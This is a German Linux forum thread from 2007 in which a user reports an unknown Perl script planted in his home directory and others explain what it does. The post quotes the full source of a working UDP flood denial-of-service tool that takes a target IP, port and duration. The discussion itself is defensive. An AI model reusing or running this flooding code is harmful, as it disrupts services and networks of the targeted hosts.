Hinweis: Das Forum wird geschlossen! Neue Registrierungen sind nicht mehr möglich!

 Zurück zu Pro-Linux   Foren-Übersicht   FAQ     Suchen    Mitgliederliste
merkwürdiges Script im Home-Verzeichnis

 
Neuen Beitrag schreiben   Auf Beitrag antworten    Pro-Linux Foren-Übersicht -> Sicherheit
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
micbur



Anmeldungsdatum: 05.06.2004
Beiträge: 86

BeitragVerfasst am: 07. Mai 2007 9:34   Titel: merkwürdiges Script im Home-Verzeichnis

Hallo,

ich sichere meinen Rechner immer, wenn ich den Platz verlasse, sodass ich mich abmelden muss. Nun gibt es in meinem Homeverzeichnis eine Datei namens flood.pl und mit ausführbaren Rechten für 'world' und mit meiner Nutzer-ID und -Gruppe.

Kann mir einer erklären, was jemand davon hat, wenn er auf meinem Rechner dieses Scipt ausführt? Ich kann kein Perl.

[edit: ich habe das nicht da hin gepackt, das weiß ich genau, weil: ich kann kein Perl und habe auch nach keinem Script gesucht oder so]

Code:
#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}


Ciao, micbur
 
Benutzer-Profile anzeigen Private Nachricht senden

Janka



Anmeldungsdatum: 11.02.2006
Beiträge: 3569

BeitragVerfasst am: 07. Mai 2007 11:19   Titel:

Das was oben drin steht. UDP-Pakete an eine bestimmte IP, beginnend mit einem bestimmten Startport schicken. Bringt NFS, SMB (nicht CIFS), VPNs und einige andere Dienste durcheinander.

Deshalb wird in einem gut gewarteten Netzwerk den normalen Benutzern auch verboten, UDP-Pakete zu verschicken.

Janka
_________________
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.
 
Benutzer-Profile anzeigen Private Nachricht senden

micbur



Anmeldungsdatum: 05.06.2004
Beiträge: 86

BeitragVerfasst am: 07. Mai 2007 12:08   Titel:

Also löschen.

Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?

Ciao, micbur
 
Benutzer-Profile anzeigen Private Nachricht senden

Janka



Anmeldungsdatum: 11.02.2006
Beiträge: 3569

BeitragVerfasst am: 08. Mai 2007 10:38   Titel:

micbur hat folgendes geschrieben::
Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?

Kommt auf die Logeinstellungen deines Paketfilters an. Normalerweise werden ausgehende Pakete aber nicht geloggt, weil das das Logfile zumüllen würde.

Janka
_________________
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.
 
Benutzer-Profile anzeigen Private Nachricht senden

Beiträge vom vorherigen Thema anzeigen:   
     Pro-Linux Foren-Übersicht -> Sicherheit Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 
Gehen Sie zu:  

Powered by phpBB © phpBB Group
pro_linux Theme © 2004 by Mandaxy